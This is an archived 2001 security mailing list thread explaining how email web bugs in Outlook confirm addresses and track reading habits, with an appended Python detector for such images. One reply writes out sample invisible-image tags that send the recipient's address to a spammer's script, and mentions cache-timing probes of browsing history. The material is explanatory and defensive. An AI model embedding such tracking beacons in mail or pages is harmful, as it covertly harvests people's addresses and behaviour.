Vulnerability Development mailing list archives
Re: Email webbugs
From: "Mariano Vassallo" <anakin () edunexo com>
Date: Tue, 28 Aug 2001 15:13:36 -0300
afaik, webbugs work like this:

Spammer X sends you an HTML mail with an invisible image from his site
(<img src=http://www.weluvspam.com/bug.gif height=1 width=1>)

When you read this email in Outlook, the image (bug.gif) is downloaded from the spammer's site. If the image is generated by a CGI script he can log the time you read your mail, and validate your address.

For example, instead of bug.gif, he could use a script to create the image:
<img src=http://www.weluvspam.com/createimage.php?mail=youremail () yourdomain com >

The script (createimage.php) could:
- save the "mail=youremail () yourdomain com" parameter to a database of valid email addresses
- save the time of the day you checked your mail (combined with the time the email was sent - taken from a database - it can be used to know how often a person checks his mail, and at what time)
- determine whether you visited a certain website recently (timing how long it takes to load an image from that website. If it loads immediately, then you probably have it in your browser's cache)

Mariano

----- Original Message -----
From: "Dom De Vitto" <Dom () DeVitto com>
To: "Peter Pekala" <peterp () netnitco net>; "abuse" <postmaster () getinfo org>; "Focus-MS" <focus-ms () securityfocus com>
Cc: "VULN-DEV@SECURITYFOCUS. COM" <VULN-DEV () securityfocus com>; "BUGTRAQ@SECURITYFOCUS. COM" <BUGTRAQ () securityfocus com>; <win2ksecadvice () listserv ntsecurity net>
Sent: Tuesday, August 28, 2001 5:42 AM
Subject: RE: Email webbugs

Webbugs are NOT return receipts!!

Everybody should *at least* have return-receipts set to 'prompt'. That is a no-brainer.

Web bugs are totally different, and can divulge a lot more information - especially when tallied with cross-host information.

Dom

-----Original Message-----
From: Peter Pekala [mailto:peterp () netnitco net]
Sent: 27 August 2001 17:11
To: abuse; Focus-MS
Cc: VULN-DEV@SECURITYFOCUS. COM; BUGTRAQ@SECURITYFOCUS. COM; win2ksecadvice () listserv ntsecurity net
Subject: Re: Email webbugs

In Outlook Express - Have you tried configuring this through Tools - Options - Receipts - Returning Read Receipts ?

- Peter

: One of the things that has always bothered me about Outlook Express and
: Outlook is that they are susceptible to webbugs. Basically there are no
: options to block confirmation of your reading an email so any spammer can
: verify that your address is active as long as they can get you to just view
: an email.
:
: A lot of people have difficulty understanding exactly what this means so I
: set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an
: attempt to raise awareness of this nonsense and get MS to do something about
: it. I don't know if other email programs like Eudora and Netscape are
: vulnerable to email webbugs so if anyone tests those please let me know the
: results.
:
: Anyway, I've made the test site available to the public now so if you want
: to check your email reader, feel free.
:
: Geo.
:
---------------------------------------------
Service provided by EDUNEXO
---------------------------------------------
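
Added example, not part of the original thread: a filter-side check for the pattern described in the message above, flagging remote images in an HTML mail body that are invisibly small, served from a dynamic URL, or carry the recipient's address. The function name `find_web_bugs`, the host names and the sample message are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

class _ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append({k.lower(): (v or "") for k, v in attrs})

def _tiny(value):
    """True for dimensions such as "0", "1" or "1px"."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v.isdigit() and int(v) <= 1

def find_web_bugs(html_body, recipient):
    """Return [(src, [reasons])] for remote images that look like web bugs."""
    collector = _ImgCollector()
    collector.feed(html_body)
    findings = []
    for img in collector.images:
        src = img.get("src", "")
        parts = urlsplit(src)
        if parts.scheme not in ("http", "https"):
            continue  # cid:/data: images ship inside the mail, no fetch occurs
        reasons = []
        if _tiny(img.get("height", "")) or _tiny(img.get("width", "")):
            reasons.append("invisible-size")
        if parts.query:
            reasons.append("dynamic-url")  # script-generated image
        if recipient.lower() in unquote(src).lower():
            reasons.append("recipient-in-url")  # confirms this address on load
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed sample body; all hosts and addresses are placeholders.
SAMPLE_HTML = """<html><body><p>Big savings inside!</p>
<img src="cid:logo@local" height="40" width="120">
<img src=http://tracker.example/bug.gif height=1 width=1>
<img src="http://tracker.example/createimage.php?mail=alice%40example.org" height="1" width="1">
<img src="https://static.example/banner.png" height="90" width="600">
</body></html>"""

if __name__ == "__main__":
    for src, reasons in find_web_bugs(SAMPLE_HTML, "alice@example.org"):
        print(", ".join(reasons), "->", src)
```

A mail client or gateway that refuses to fetch any remote image until the user asks defeats all three signals at once; the heuristics here are useful for logging and triage.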